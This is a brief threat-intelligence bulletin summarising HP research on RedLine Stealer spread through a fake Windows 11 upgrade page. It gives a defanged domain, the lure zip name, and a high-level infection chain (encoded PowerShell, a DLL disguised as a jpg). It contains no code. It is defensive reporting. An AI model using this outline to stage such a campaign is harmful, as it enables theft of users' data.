2022-02-15

RedLine Stealer Spreading from Illegitimate Windows 11 Upgrade

Level: 
Tactical
  |  Source: 
HP - ThreatResearch
Information & Technology
Share:

RedLine Stealer spreading from illegitimate Windows 11 Upgrade

Threat Research from HP has identified the distribution of information-stealing malware, RedLine Stealer posing as an installer to Microsoft's latest Windows 11 OS version. The threat campaign is recent, as one of the malicious domain windows-upgraded[.]com was registered on January 27th, 2022. The fraudulent Microsoft page drops a malicious zip file, "Windows11InstallationAssistant.zip" for users to click the download link. The zip file is hosted on Discord containing "six Windows DLLs, an XML file and a portable executable." Upon execution of the malicious executable file, an encoded PowerShell command runs with a download of a jpg file following a 21-second timeout. The jpg file is actually a disguised DLL file. Once the DLL is loaded, the RedLine Stealer payload is active and able to proceed with data collection and exfiltration as desired by the attacker.

     

Get trending threats published weekly by the Anvilogic team.

Sign Up Now